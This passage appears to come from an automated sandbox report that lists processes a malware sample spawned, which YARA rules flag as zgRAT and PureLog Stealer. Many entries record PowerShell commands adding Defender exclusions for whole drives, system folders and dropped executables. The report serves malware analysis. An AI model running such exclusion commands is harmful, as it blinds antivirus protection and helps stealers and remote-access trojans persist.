                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB66E.tmp" "c:\Program Files\Everything\CSCA17046CBF8B64A188168A4AB380809F.TMP"
                                                                                                          Imagebase:0x7ff6647f0000
                                                                                                          File size:52'744 bytes
                                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:25
                                                                                                          Start time:11:12:32
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:26
                                                                                                          Start time:11:12:32
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:27
                                                                                                          Start time:11:12:32
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:28
                                                                                                          Start time:11:12:32
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:29
                                                                                                          Start time:11:12:32
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:30
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:31
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:32
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:33
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:34
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:35
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:36
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:37
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:38
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:39
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:40
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:41
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:42
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:43
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:44
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:45
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:46
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:47
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:48
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:49
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:50
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:51
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\apppatch\CustomSDB\sihost.exe'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:52
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:53
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:54
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:55
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:56
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:57
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe'
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:58
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:59
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:60
                                                                                                          Start time:11:12:33
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:61
                                                                                                          Start time:11:12:35
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KDhudFNWvk.bat"
                                                                                                          Imagebase:0x7ff6a3890000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:62
                                                                                                          Start time:11:12:35
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:63
                                                                                                          Start time:11:12:35
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Program Files\Everything\Everything.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Everything\Everything.exe" -startup
                                                                                                          Imagebase:0xe30000
                                                                                                          File size:4'608 bytes
                                                                                                          MD5 hash:0E5995C0475E4E57F7A6B3FA6E790ABD
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:64
                                                                                                          Start time:11:12:38
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                                                                                          Imagebase:0xf20000
                                                                                                          File size:2'025'984 bytes
                                                                                                          MD5 hash:77967721CE1C8B3F0EB800BD33527897
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                          Has exited:false

                                                                                                          Target ID:65
                                                                                                          Start time:11:12:38
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Program Files\Everything\Everything.exe.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Everything\Everything.exe.exe" -startup
                                                                                                          Imagebase:0x7ff728bb0000
                                                                                                          File size:2'265'096 bytes
                                                                                                          MD5 hash:0170601E27117E9639851A969240B959
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:66
                                                                                                          Start time:11:12:38
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:chcp 65001
                                                                                                          Imagebase:0x7ff622770000
                                                                                                          File size:14'848 bytes
                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:67
                                                                                                          Start time:11:12:43
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\w32tm.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                          Imagebase:0x7ff6c8f90000
                                                                                                          File size:108'032 bytes
                                                                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:69
                                                                                                          Start time:11:12:47
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                                                                                          Imagebase:0xb50000
                                                                                                          File size:2'025'984 bytes
                                                                                                          MD5 hash:77967721CE1C8B3F0EB800BD33527897
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                          Has exited:true

                                                                                                          Target ID:70
                                                                                                          Start time:11:12:52
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                                                                                          Imagebase:0x2b0000
                                                                                                          File size:2'025'984 bytes
                                                                                                          MD5 hash:77967721CE1C8B3F0EB800BD33527897
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, Author: Joe Security
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Avira
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                          Has exited:true

                                                                                                          Target ID:71
                                                                                                          Start time:11:12:56
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                          Imagebase:0x7ff6ef0c0000
                                                                                                          File size:496'640 bytes
                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:72
                                                                                                          Start time:11:12:56
